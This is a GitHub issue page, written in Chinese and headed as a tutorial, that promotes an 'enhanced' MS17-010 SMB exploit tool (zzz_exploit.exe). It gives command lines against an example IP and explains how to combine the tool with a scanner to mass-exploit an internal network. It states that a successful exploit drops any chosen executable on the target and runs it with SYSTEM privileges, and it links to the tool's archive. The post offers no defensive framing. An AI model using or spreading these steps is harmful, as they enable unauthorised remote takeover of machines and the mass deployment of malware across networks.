Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

〖教程〗SMB溢出工具加强版 #17

Open
k8gege opened this issue Aug 23, 2020 · 0 comments
Open

〖教程〗SMB溢出工具加强版 #17

k8gege opened this issue Aug 23, 2020 · 0 comments

Comments

@k8gege
Copy link
Owner

k8gege commented Aug 23, 2020

工具:k8加强版zzz

编译:python

漏洞:MS17-010

用法:

zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe参数
zzz_exploit.exe 192.11.22.82 exe参数 管道名

如exe启动参数为  m.exe -Start 实战命令为 zzz_exploit.exe 192.11.22.82 -Start

内网批量

可结合cping批量溢出内网,将名称改为smbcheck即可,但exe必须使用无参版。(其它工具也可以,提供个IP参数即可)

因为cping只会传IP进去,不会传其它参数。使用前需将任意exe改名为ma.dat

溢出成功会自动将exe传入目标机器,并以system权限启动exe程序。

 

链接: https://github.com/k8gege/K8tools/blob/master/k8zzz.rar

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant